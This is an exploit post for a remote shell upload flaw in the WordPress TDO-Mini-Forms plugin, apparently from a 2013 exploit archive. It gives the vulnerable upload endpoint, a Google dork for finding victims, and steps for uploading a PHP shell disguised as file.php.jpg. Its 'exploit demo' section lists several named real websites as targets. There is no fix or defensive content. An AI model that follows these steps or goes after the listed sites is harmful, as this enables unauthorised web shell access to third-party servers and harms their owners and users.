WordPress TDO-Mini-Forms plugin suffers from a remote shell upload vulnerability. Note that this advisory has site-specific information.
dd7a1f30b079574bc9e5164885cb54a88ca896408d8bb740e5d04f22f621c9ff
###############################################################
# Exploit Title: Wordpress TDO-Mini-Forms Plugin Arbitrary File Upload
Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/09/2013
# Vendor Homepage: http://thedeadone.net
# Software Link :
http://cznic.dl.sourceforge.net/project/filip/wordpress/tdo-mini-forms.0.13.9.zip
# Google dork: inurl:/wp-content/plugins/tdo-mini-forms/
# Tested on: Windows/Linux
###############################################################
1)Exploit :
= = = = = =
1.Go to http://
[target]/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=[ID]&index=
2.Click To Browse And Select Your Shell Script(ex file.php.jpg)
3.Clict to Upload Now for upload
# Uploaded files :
http://127.0.0.1/wp-content/uploads/tdomf/tmp/[FormID]/[YourIP]/file.php.jpg
2) Exploit demo :
= = = = = = = = =
http://moiatadieta.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://100mostbeautifulbabies.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://pawsintograce.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://activeyouth.co.uk/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #